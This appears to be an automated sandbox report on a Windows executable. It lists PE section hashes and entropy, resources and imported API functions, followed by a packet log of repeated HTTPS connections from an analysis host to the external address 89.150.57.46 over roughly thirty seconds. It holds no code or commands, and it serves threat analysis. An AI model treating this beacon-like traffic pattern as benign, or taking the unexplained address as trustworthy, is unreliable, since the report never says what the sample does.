.text | 0x1000 | 0x211a3c | 0x211c00 | a7bb40416dfe6477f8e3ce3ca337326c | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x213000 | 0xc1e58 | 0xc2000 | fdbdad3cc633e673fd958b18b960df54 | False | 0.27393962427512886 | data | 4.498731764060973 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x2d5000 | 0x1771c | 0xb800 | c2df8284278ede26c37d438e19173d49 | False | 0.16550611413043478 | data | 4.479725947739707 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata | 0x2ed000 | 0x185e8 | 0x18600 | 704edeed305891f0bf7ceec95f99d1ad | False | 0.504286858974359 | data | 6.2240240078238855 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x306000 | 0x70698 | 0x70800 | 4b5d2bf5b01b522a4531a99ecfd6c5d0 | False | 0.7417035590277777 | data | 7.144230024604653 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x377000 | 0xf7b8 | 0xf800 | 36f1ec4316f8ab104ef0c0169949ba29 | False | 0.0985383064516129 | data | 5.449482947571136 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x306468 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | United States | 0.369136460554371
RT_ICON | 0x307310 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | United States | 0.4187725631768953
RT_ICON | 0x307bb8 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | United States | 0.4147398843930636
RT_ICON | 0x308120 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | United States | 0.5245850622406639
RT_ICON | 0x30a6c8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | United States | 0.6285178236397748
RT_ICON | 0x30b770 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | United States | 0.7668439716312057
RT_ICON | 0x30bbd8 | 0x19df | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9818813226634455
RT_ICON | 0x30d5b8 | 0x1891 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9790109715376053
RT_ICON | 0x30ee4c | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 0 | English | United States | 0.06688453803383414
RT_ICON | 0x31f674 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 0 | English | United States | 0.14365847897968823
RT_ICON | 0x32389c | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | United States | 0.20653526970954356
RT_ICON | 0x325e44 | 0x1a68 | Device independent bitmap graphic, 40 x 80 x 32, image size 0 | English | United States | 0.2338757396449704
RT_ICON | 0x3278ac | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | United States | 0.2797842401500938
RT_ICON | 0x328954 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | English | United States | 0.3495901639344262
RT_ICON | 0x3292dc | 0x6b8 | Device independent bitmap graphic, 20 x 40 x 32, image size 0 | English | United States | 0.3866279069767442
RT_ICON | 0x329994 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | United States | 0.4512411347517731
RT_DIALOG | 0x329dfc | 0x4c0df | data | | | 0.9726180425592018
RT_GROUP_ICON | 0x375edc | 0x92 | data | English | United States | 0.726027397260274
RT_VERSION | 0x375f70 | 0x4a4 | data | English | United States | 0.4107744107744108
RT_MANIFEST | 0x376414 | 0x282 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.5529595015576324

DLL | Import
KERNEL32.dll | EncodePointer, GetSystemDirectoryW, CompareStringW, GetLocaleInfoW, GetUserDefaultUILanguage, GlobalFlags, SetEvent, WaitForSingleObject, CreateEventW, SetThreadPriority, ResumeThread, FreeResource, GlobalFindAtomW, WriteFile, GetCurrentDirectoryW, FileTimeToLocalFileTime, GetFileAttributesW, GetFileAttributesExW, GetFileSizeEx, GetFileTime, SystemTimeToTzSpecificLocalTime, VirtualProtect, lstrcpyW, FindResourceExW, GetWindowsDirectoryW, VerSetConditionMask, VerifyVersionInfoW, GetTempFileNameW, GetTempPathW, GetTickCount, GetProfileIntW, SearchPathW, GetUserDefaultLCID, ResetEvent, WaitForSingleObjectEx, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, IsDebuggerPresent, GetStartupInfoW, QueryPerformanceCounter, GetSystemTimeAsFileTime, InitializeSListHead, OutputDebugStringW, GetStringTypeW, LCMapStringW, GetCPInfo, RtlUnwindEx, RtlPcToFileHeader, GetStdHandle, GetFileType, WriteConsoleW, GetCommandLineA, GetCommandLineW, HeapQueryInformation, CreateThread, ExitThread, FreeLibraryAndExitThread, GetSystemInfo, VirtualAlloc, VirtualQuery, QueryPerformanceFrequency, SetStdHandle, GetACP, IsValidLocale, EnumSystemLocalesW, SetFilePointerEx, GetConsoleMode, ReadConsoleW, GetConsoleCP, GetTimeZoneInformation, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetOEMCP, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetEnvironmentVariableW, GetLocalTime, UnlockFile, SetFilePointer, SetEndOfFile, ReadFile, LockFile, GetVolumeInformationW, GetFullPathNameW, GetFileSize, FlushFileBuffers, FindFirstFileW, FindClose, DeleteFileW, CreateFileW, GlobalAddAtomW, lstrcmpW, GlobalDeleteAtom, LoadLibraryExW, FreeLibrary, GetVersionExW, FileTimeToSystemTime, GlobalGetAtomNameW, lstrcmpA, GetCurrentProcessId, LocalReAlloc, LocalAlloc, GlobalHandle, GlobalReAlloc, TlsFree, TlsSetValue, TlsGetValue, TlsAlloc, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, GetProcAddress, GetModuleHandleW, QueryActCtxW, FindActCtxSectionStringW, DeactivateActCtx, ActivateActCtx, CreateActCtxW, LoadLibraryW, GetModuleHandleExW, GetModuleFileNameW, OutputDebugStringA, WideCharToMultiByte, SetLastError, CopyFileW, MulDiv, GlobalFree, GlobalUnlock, GlobalLock, GlobalSize, GlobalAlloc, lstrcmpiW, GetCurrentProcess, ExitProcess, DuplicateHandle, MoveFileExW, GetDriveTypeW, GetFileInformationByHandle, PeekNamedPipe, CloseHandle, OpenEventW, GetProcessHeap, DeleteCriticalSection, HeapDestroy, DecodePointer, HeapAlloc, RaiseException, HeapReAlloc, HeapSize, InitializeCriticalSectionAndSpinCount, HeapFree, Sleep, MultiByteToWideChar, GetLastError, FindResourceW, LoadResource, LockResource, SizeofResource, SetConsoleCtrlHandler, GetCurrentThreadId, LocalFree, FormatMessageW
USER32.dll | SetLayeredWindowAttributes, EnumDisplayMonitors, SetClassLongPtrW, SetWindowRgn, SetParent, OpenClipboard, CloseClipboard, SetClipboardData, EmptyClipboard, DrawStateW, DrawEdge, DrawFrameControl, IsZoomed, GetSystemMenu, BringWindowToTop, SetCursorPos, CopyIcon, FrameRect, DrawIcon, UnionRect, UpdateLayeredWindow, MonitorFromPoint, LoadAcceleratorsW, TranslateAcceleratorW, InsertMenuItemW, UnpackDDElParam, ReuseDDElParam, GetComboBoxInfo, WaitMessage, GetKeyboardLayout, IsCharLowerW, MapVirtualKeyExW, ToUnicodeEx, GetKeyboardState, CreateAcceleratorTableW, DestroyAcceleratorTable, CopyAcceleratorTableW, SetRect, LockWindowUpdate, SetMenuDefaultItem, GetDoubleClickTime, ModifyMenuW, RegisterClipboardFormatW, CharUpperBuffW, IsClipboardFormatAvailable, GetUpdateRect, DrawMenuBar, DefFrameProcW, DefMDIChildProcW, TranslateMDISysAccel, SubtractRect, CreateMenu, GetWindowRgn, DestroyCursor, EndPaint, BeginPaint, SetForegroundWindow, GetForegroundWindow, SetActiveWindow, UpdateWindow, TrackPopupMenu, SetMenu, GetMenu, GetCapture, IsIconic, EndDeferWindowPos, DeferWindowPos, BeginDeferWindowPos, SetWindowPlacement, GetWindowPlacement, DestroyWindow, GetIconInfo, IsMenu, CreateWindowExW, GetClassInfoExW, GetClassInfoW, RegisterClassW, CallWindowProcW, DefWindowProcW, GetMessageTime, GetMessagePos, RegisterWindowMessageW, GetScrollPos, SetScrollPos, CallNextHookEx, SetWindowsHookExW, GetCursorPos, ValidateRect, GetKeyState, GetActiveWindow, IsWindowVisible, PeekMessageW, RealChildWindowFromPoint, GetKeyNameTextW, GetDesktopWindow, PtInRect, ClientToScreen, GetWindowRect, CharUpperW, DestroyIcon, PostMessageW, IsDialogMessageW, GetWindow, SetWindowLongW, SetWindowTextW, GetFocus, SetFocus, GetDlgCtrlID, CheckDlgButton, GetDlgItem, SetWindowPos, MoveWindow, ShowWindow, IsWindow, GetWindowTextLengthW, GetWindowTextW, GetLastActivePopup, GetWindowThreadProcessId, GetParent, GetWindowLongW, MessageBoxW, IsWindowEnabled, EnableWindow, SendMessageW, LoadCursorW, GetSysColorBrush, GetSysColor, ReleaseDC, GetDC, GetSystemMetrics, UnhookWindowsHookEx, RemoveMenu, AppendMenuW, InsertMenuW, GetMenuItemCount, GetMenuItemID, GetSubMenu, GetMenuState, GetMenuStringW, DrawIconEx, PostThreadMessageW, GetMessageW, TranslateMessage, DispatchMessageW, MapVirtualKeyW, IsRectEmpty, DrawFocusRect, WindowFromPoint, ReleaseCapture, SetCapture, GetNextDlgGroupItem, LoadImageW, TrackMouseEvent, IntersectRect, MapDialogRect, GetAsyncKeyState, GetNextDlgTabItem, EndDialog, CreateDialogIndirectParamW, OffsetRect, SetRectEmpty, SendDlgItemMessageA, InflateRect, GetMenuItemInfoW, DestroyMenu, FillRect, GetWindowDC, TabbedTextOutW, GrayStringW, DrawTextExW, RedrawWindow, InvalidateRect, KillTimer, SetTimer, DeleteMenu, SetCursor, ShowOwnedPopups, SystemParametersInfoW, CopyImage, LoadBitmapW, SetMenuItemInfoW, GetMenuCheckMarkDimensions, SetMenuItemBitmaps, EnableMenuItem, CheckMenuItem, GetMonitorInfoW, MonitorFromWindow, WinHelpW, GetScrollInfo, GetMenuDefaultItem, LoadMenuW, CreatePopupMenu, NotifyWinEvent, InvertRect, HideCaret, EnableScrollBar, GetClassNameW, MessageBeep, SetScrollInfo, LoadIconW, GetTopWindow, GetClassLongPtrW, SetWindowLongPtrW, GetWindowLongPtrW, EqualRect, CopyRect, MapWindowPoints, ScreenToClient, AdjustWindowRectEx, GetClientRect, RemovePropW, PostQuitMessage, GetPropW, SetPropW, ShowScrollBar, GetScrollRange, SetScrollRange, IsChild, ScrollWindow, DrawTextW
ole32.dll | IsAccelerator, CoCreateInstance, OleTranslateAccelerator, OleDestroyMenuDescriptor, OleCreateMenuDescriptor, OleLockRunning, RevokeDragDrop, RegisterDragDrop, CoLockObjectExternal, OleGetClipboard, DoDragDrop, CreateStreamOnHGlobal, CoInitialize, CoDisconnectObject, ReleaseStgMedium, OleDuplicateData, CoTaskMemFree, CoTaskMemAlloc, CoUninitialize, CoInitializeEx, OleRun
OLEAUT32.dll | VariantChangeType, SysAllocString, SysFreeString, SysAllocStringLen, VariantCopy, VarBstrFromDate, VariantInit, SysStringLen, SystemTimeToVariantTime, VariantTimeToSystemTime, GetErrorInfo, LoadTypeLib, VariantClear
MSIMG32.dll | AlphaBlend, TransparentBlt
SHLWAPI.dll | PathIsUNCW, PathStripToRootW, PathRemoveFileSpecW, StrFormatKBSizeW, PathFindExtensionW, PathFileExistsW, PathFindFileNameW
UxTheme.dll | GetThemeColor, IsAppThemed, GetThemePartSize, GetThemeSysColor, DrawThemeText, DrawThemeParentBackground, OpenThemeData, CloseThemeData, DrawThemeBackground, GetWindowTheme, GetCurrentThemeName, IsThemeBackgroundPartiallyTransparent
OLEACC.dll | LresultFromObject, AccessibleObjectFromWindow, CreateStdAccessibleObject
gdiplus.dll | GdipDisposeImage, GdipGetImageWidth, GdiplusStartup, GdipFree, GdipAlloc, GdiplusShutdown, GdipGetImageHeight, GdipGetImagePixelFormat, GdipGetImagePalette, GdipGetImagePaletteSize, GdipCreateBitmapFromStream, GdipCreateBitmapFromScan0, GdipBitmapLockBits, GdipBitmapUnlockBits, GdipDeleteGraphics, GdipDrawImageI, GdipGetImageGraphicsContext, GdipCreateBitmapFromHBITMAP, GdipCreateFromHDC, GdipCloneImage, GdipDrawImageRectI, GdipSetInterpolationMode
IMM32.dll | ImmReleaseContext, ImmGetOpenStatus, ImmGetContext
WINMM.dll | PlaySoundW
GDI32.dll | GetViewportExtEx, GetObjectType, IntersectClipRect, LineTo, GetStockObject, GetPixel, GetClipBox, ExcludeClipRect, Escape, DeleteDC, CreateSolidBrush, CreateRectRgn, CreatePatternBrush, CreatePen, CreateHatchBrush, CreateCompatibleDC, BitBlt, CreateBitmap, GetObjectW, SetTextColor, SetBkColor, DeleteObject, GetDeviceCaps, GetWindowExtEx, CopyMetaFileW, GetTextFaceW, GetViewportOrgEx, GetWindowOrgEx, SetPixelV, SetPaletteEntries, ExtFloodFill, PtInRegion, GetBoundsRect, FrameRgn, FillRgn, RoundRect, OffsetRgn, GetRgnBox, Rectangle, LPtoDP, CreateRoundRectRgn, Polyline, Polygon, CreatePolygonRgn, GetTextColor, Ellipse, CreateEllipticRgn, SetDIBColorTable, CreateDIBSection, StretchBlt, SetPixel, PtVisible, RectVisible, RestoreDC, GetTextCharsetInfo, SaveDC, SelectClipRgn, ExtSelectClipRgn, SelectObject, SelectPalette, SetBkMode, SetMapMode, SetLayout, GetLayout, SetPolyFillMode, SetROP2, SetTextAlign, MoveToEx, TextOutW, ExtTextOutW, SetViewportExtEx, SetViewportOrgEx, SetWindowExtEx, SetWindowOrgEx, OffsetViewportOrgEx, OffsetWindowOrgEx, ScaleViewportExtEx, ScaleWindowExtEx, CreateFontIndirectW, GetTextExtentPoint32W, CombineRgn, CreateRectRgnIndirect, PatBlt, SetRectRgn, DPtoLP, GetTextMetricsW, EnumFontFamiliesExW, CreatePalette, GetNearestPaletteIndex, GetPaletteEntries, GetSystemPaletteEntries, RealizePalette, GetBkColor, CreateCompatibleBitmap, CreateDIBitmap, EnumFontFamiliesW, CreateDCW
WINSPOOL.DRV | DocumentPropertiesW, OpenPrinterW, ClosePrinter
ADVAPI32.dll | RegCloseKey, RegCreateKeyExW, RegDeleteKeyW, RegOpenKeyExW, RegQueryValueExW, RegDeleteValueW, RegEnumKeyExW, RegSetValueExW, AddAccessAllowedAce, AllocateAndInitializeSid, FreeSid, GetLengthSid, InitializeAcl, InitializeSecurityDescriptor, MakeSelfRelativeSD, SetSecurityDescriptorDacl
SHELL32.dll | SHAppBarMessage, SHBrowseForFolderW, DragFinish, DragQueryFileW, SHGetFileInfoW, ShellExecuteW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetSpecialFolderLocation

Language of compilation system | Country where language is spoken | Map
English | United States |

Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                          Apr 19, 2024 15:31:15.523010015 CEST49704443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:15.523540974 CEST49704443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:15.523555040 CEST4434970489.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:17.477154970 CEST49713443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:17.477186918 CEST4434971389.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:17.477473021 CEST49713443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:17.480671883 CEST49713443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:17.480683088 CEST4434971389.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:18.094208002 CEST4434971389.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:18.094326973 CEST49713443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:18.095113039 CEST49713443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:18.095123053 CEST4434971389.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:18.104336023 CEST49713443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:18.104348898 CEST4434971389.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:18.502471924 CEST4434971389.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:18.502552032 CEST49713443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:18.502567053 CEST4434971389.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:18.502634048 CEST4434971389.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:18.502661943 CEST49713443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:18.502748966 CEST49713443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:18.522366047 CEST49713443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:18.522382975 CEST4434971389.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:20.467247009 CEST49714443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:20.467284918 CEST4434971489.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:20.467391968 CEST49714443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:20.467710018 CEST49714443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:20.467721939 CEST4434971489.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:21.078707933 CEST4434971489.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:21.078772068 CEST49714443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:21.079746008 CEST49714443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:21.079754114 CEST4434971489.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:21.081568956 CEST49714443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:21.081573963 CEST4434971489.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:21.485718966 CEST4434971489.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:21.485830069 CEST49714443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:21.485831976 CEST4434971489.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:21.485944033 CEST49714443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:21.486954927 CEST49714443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:21.486968994 CEST4434971489.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:23.433077097 CEST49715443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:23.433109999 CEST4434971589.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:23.433284998 CEST49715443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:23.433631897 CEST49715443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:23.433644056 CEST4434971589.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:24.054799080 CEST4434971589.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:24.054903030 CEST49715443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:24.057507038 CEST49715443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:24.057518959 CEST4434971589.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:24.061714888 CEST49715443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:24.061722040 CEST4434971589.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:24.468878984 CEST4434971589.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:24.468945026 CEST49715443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:24.468998909 CEST4434971589.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:24.469036102 CEST49715443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:24.469059944 CEST4434971589.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:24.469072104 CEST4434971589.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:24.469098091 CEST49715443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:24.469131947 CEST49715443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:24.469405890 CEST49715443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:24.469428062 CEST4434971589.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:26.399245977 CEST49716443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:26.399312019 CEST4434971689.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:26.399416924 CEST49716443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:26.399903059 CEST49716443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:26.399940014 CEST4434971689.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:27.015352011 CEST4434971689.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:27.015604019 CEST49716443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:27.015966892 CEST49716443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:27.015980959 CEST4434971689.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:27.017416954 CEST49716443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:27.017426968 CEST4434971689.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:27.422363043 CEST4434971689.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:27.422720909 CEST4434971689.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:27.422801971 CEST49716443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:27.423295021 CEST49716443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:27.423316002 CEST4434971689.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:29.427974939 CEST49717443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:29.428011894 CEST4434971789.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:29.428257942 CEST49717443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:29.428721905 CEST49717443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:29.428734064 CEST4434971789.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:30.045013905 CEST4434971789.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:30.045114040 CEST49717443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:30.046247005 CEST49717443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:30.046272993 CEST4434971789.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:30.048870087 CEST49717443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:30.048882961 CEST4434971789.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:30.451477051 CEST4434971789.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:30.451663971 CEST4434971789.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:30.451760054 CEST49717443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:30.579319000 CEST49717443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:30.579354048 CEST4434971789.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:33.817806005 CEST49718443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:33.817847967 CEST4434971889.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:33.817940950 CEST49718443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:33.818568945 CEST49718443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:33.818598032 CEST4434971889.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:34.435663939 CEST4434971889.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:34.436024904 CEST49718443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:34.436491966 CEST49718443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:34.436505079 CEST4434971889.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:34.437891006 CEST49718443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:34.437896967 CEST4434971889.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:34.842950106 CEST4434971889.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:34.843091965 CEST49718443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:34.843133926 CEST4434971889.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:34.843199015 CEST49718443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:34.843216896 CEST4434971889.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:34.843266964 CEST49718443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:34.843272924 CEST4434971889.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:34.843329906 CEST49718443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:34.843564034 CEST49718443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:34.843581915 CEST4434971889.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:36.770405054 CEST49719443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:36.770479918 CEST4434971989.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:36.773403883 CEST49719443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:36.773751974 CEST49719443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:36.773787022 CEST4434971989.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:37.399153948 CEST4434971989.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:37.399259090 CEST49719443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:37.399836063 CEST49719443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:37.399863005 CEST4434971989.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:37.401452065 CEST49719443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:37.401465893 CEST4434971989.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:37.816653013 CEST4434971989.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:37.816793919 CEST49719443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:37.818249941 CEST4434971989.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:37.818316936 CEST49719443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:37.818337917 CEST4434971989.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:37.818361998 CEST4434971989.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:37.818408966 CEST49719443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:37.818499088 CEST49719443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:37.818572044 CEST49719443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:37.818608046 CEST4434971989.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:37.818635941 CEST49719443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:37.818686008 CEST49719443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:39.756705999 CEST49720443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:39.756733894 CEST4434972089.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:39.756907940 CEST49720443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:39.757302046 CEST49720443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:39.757316113 CEST4434972089.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:40.380568981 CEST4434972089.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:40.382889032 CEST49720443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:40.383382082 CEST49720443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:40.383392096 CEST4434972089.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:40.384851933 CEST49720443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:40.384857893 CEST4434972089.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:40.797818899 CEST4434972089.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:40.797930956 CEST49720443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:40.797941923 CEST4434972089.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:40.797951937 CEST4434972089.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:40.797991991 CEST49720443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:40.798022032 CEST49720443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:40.798422098 CEST49720443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:40.798443079 CEST4434972089.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:42.739157915 CEST49721443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:42.739203930 CEST4434972189.150.57.46192.168.2.6
                                                                          Apr 19, 2024 15:31:42.739350080 CEST49721443192.168.2.689.150.57.46
                                                                          Apr 19, 2024 15:31:42.739634037 CEST49721443192.168.2.689.150.57.46
